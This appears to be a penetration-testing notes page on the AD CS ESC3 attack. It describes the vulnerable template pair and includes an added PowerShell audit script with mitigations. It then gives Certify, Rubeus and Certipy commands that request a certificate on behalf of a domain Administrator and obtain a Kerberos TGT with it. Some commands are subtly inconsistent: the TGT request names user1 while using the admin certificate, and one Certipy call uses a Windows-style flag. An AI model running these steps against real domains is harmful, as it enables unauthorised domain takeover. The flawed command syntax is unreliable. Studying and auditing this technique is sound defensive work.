ESC3

Unlike ESC1 and ESC2, this method requires two certificate templates that meet the following requirements:

  • First Template
    • Certificate Request Agent EKU
  • Second Template
    • Client Authentication EKU
    • Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1

And, of course, a user with enrollment rights.

In the context of ADCS, the Application Policy defines additional constraints that must be met before a certificate can be issued from a template. Having the Authorized Signatures Required attribute set to 1 (or TRUE) means that a request for this template must carry an authorized signature, which is how the issuance process enforces authorization and control over the issued certificate.
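As an added audit example (not part of the original page and not a Certify or Certipy feature), the following PowerShell script reads the certificate templates from the Configuration partition and flags the two template shapes described above: templates that issue the Certificate Request Agent EKU, and Client Authentication templates whose issuance requirement accepts that agent policy with Authorized Signatures Required set to 1 or more. It assumes the RSAT ActiveDirectory module is installed and that the account running it can read the Configuration naming context; the OIDs and LDAP attribute names are the standard ones, and the output object fields are the script's own.

```powershell
# Added example: audit AD CS templates for the ESC3 template pair.
# Assumes the ActiveDirectory RSAT module and read access to the Configuration NC.
Import-Module ActiveDirectory

$RequestAgentEku = '1.3.6.1.4.1.311.20.2.1'   # Certificate Request Agent EKU OID
$ClientAuthEku   = '1.3.6.1.5.5.7.3.2'        # Client Authentication EKU OID

$configNC   = (Get-ADRootDSE).configurationNamingContext
$templateDN = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"

$templates = Get-ADObject -SearchBase $templateDN `
    -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties pKIExtendedKeyUsage, 'msPKI-RA-Signature',
                'msPKI-RA-Application-Policies', 'msPKI-Certificate-Application-Policy'

foreach ($t in $templates) {
    # Version 1 templates keep EKUs in pKIExtendedKeyUsage; newer templates also
    # populate msPKI-Certificate-Application-Policy, so both are checked.
    $ekus     = @($t.pKIExtendedKeyUsage) + @($t.'msPKI-Certificate-Application-Policy')
    $raSigs   = [int]($t.'msPKI-RA-Signature')              # Authorized Signatures Required
    $raPolicy = @($t.'msPKI-RA-Application-Policies')       # Application Policy issuance requirement

    # First template shape: issues enrollment-agent certificates.
    if ($ekus -contains $RequestAgentEku) {
        [pscustomobject]@{
            Template = $t.Name
            Finding  = 'Issues Certificate Request Agent EKU'
        }
    }

    # Second template shape: client authentication, and the issuance requirement
    # is satisfied by one or more signatures carrying the request-agent policy.
    if (($ekus -contains $ClientAuthEku) -and ($raSigs -ge 1) -and
        ($raPolicy -contains $RequestAgentEku)) {
        [pscustomobject]@{
            Template = $t.Name
            Finding  = "Client Authentication; $raSigs RA signature(s) required; accepts Certificate Request Agent policy"
        }
    }
}
```

The list is a starting point, not a verdict: a flagged template is only exposed if it is published on a CA and a low-privilege principal holds enrollment rights on it, so those two checks (the CA's published templates and each template's security descriptor) belong in the same review. The usual mitigations are to limit who can enroll in the agent-issuing template and to configure the CA's enrollment agent restrictions so that agent certificates can only enroll specific templates for specific users.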

Windows

Requesting a certificate

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\MINIONS-DC-CA /template:<template_name>

Convert Certificate

Request a Certificate on behalf of the Administrator

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\MINIONS-DC-CA /template:<template_name> /onbehalfof:minions\Administrator /enrollcert:cert.pfx

Convert Certificate (output: admin.pfx)

Request a TGT as the Administrator

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1@minions.com /certificate:admin.pfx /getcredentials

Linux

Requesting a certificate

bob$ certipy req -ca MINIONS-DC-CA -template <template_name> /altname:administrator@minions.com

Requesting a certificate on behalf of the Administrator account

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca MINIONS-DC-CA -template <template_name> -on-behalf-of 'minions\administrator' -pfx user1.pfx